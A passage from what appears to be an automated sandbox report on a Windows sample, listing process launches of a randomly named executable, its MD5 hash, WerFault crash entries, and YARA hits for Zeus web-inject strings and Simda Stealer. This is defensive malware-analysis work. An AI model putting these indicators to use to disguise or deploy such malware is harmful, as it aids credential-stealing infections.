                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2649332327.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2776308232.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2788341406.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2809880778.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2785726916.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2787182616.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2758822752.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2809200397.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2757164455.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2775825052.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.2168388667.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2168388667.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2776041284.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2790907170.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2794030784.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2774710797.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2170461210.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2792838901.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2773445866.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2791900704.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2789409871.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2784224437.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2790002799.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2810131303.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2707114238.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2678865886.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                  Start time:12:51:00
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2605884801.00000000011E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.2605946728.0000000001240000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                  Start time:12:51:00
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.2632861320.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000007.00000002.2635595118.0000000001040000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                  Start time:12:51:00
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000009.00000002.2610626005.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000009.00000002.2610520727.00000000009C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                  Start time:12:51:01
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000B.00000002.2649599507.0000000003270000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000B.00000002.2639594297.0000000002EA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                  Start time:12:51:01
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 904
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                  Start time:12:51:01
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 884
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                  Start time:12:51:01
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 980
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                  Start time:12:51:03
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2611939403.0000000002AF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000010.00000002.2612614586.0000000002B80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                  Start time:12:51:04
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 2076
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                  Start time:12:51:06
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2647909784.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2639288300.00000000011D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                  Start time:12:51:07
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2694402665.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2699555610.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                  Start time:12:51:09
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 968
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                  Start time:12:51:10
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.2705436372.00000000024F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                  Start time:12:51:10
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1008
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                  Start time:12:51:12
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2725518370.0000000002E80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2728043702.0000000003040000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                  Start time:12:51:12
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 832
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                  Start time:12:51:14
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.2759598984.00000000025F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.2785000519.00000000027A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                  Start time:12:51:15
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1008
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
